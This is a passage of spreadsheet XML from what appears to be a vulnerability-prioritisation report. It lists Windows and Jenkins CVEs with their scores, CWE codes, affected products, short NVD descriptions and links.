      <c r="Q102" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>Jenkins OWASP Dependency-Check Plugin 5.6.4 and earlier does not escape CWE values from Dependency-Check reports on the Jenkins UI, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.</t>
        </is>
      </c>
      <c r="S102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92136</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69270</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K103"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03" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr"/>
      <c r="Q103" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69295</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K104"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04" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr"/>
      <c r="Q104" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69307</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K105"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05" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr"/>
      <c r="Q105" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69571</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K106"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06" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr"/>
      <c r="Q106" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69584</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K107"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07" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr"/>
      <c r="Q107" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69687</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K108"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08" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr"/>
      <c r="Q108" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69707</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K109"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09" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr"/>
      <c r="Q109" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69822</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr"/>
      <c r="Q110" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69841</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K111"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11" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr"/>
      <c r="Q111" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69844</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K112"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12" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr"/>
      <c r="Q112" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69900</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K113" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr"/>
      <c r="Q113" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69907</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K114"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114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr"/>
      <c r="Q114" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69921</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K115" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr"/>
      <c r="Q115" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70564</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K116"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16" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr"/>
      <c r="Q116" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70569</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr"/>
      <c r="Q117" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71334</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K118"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18" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr"/>
      <c r="Q118" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77500</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K119"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119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr"/>
      <c r="Q119" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20342</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
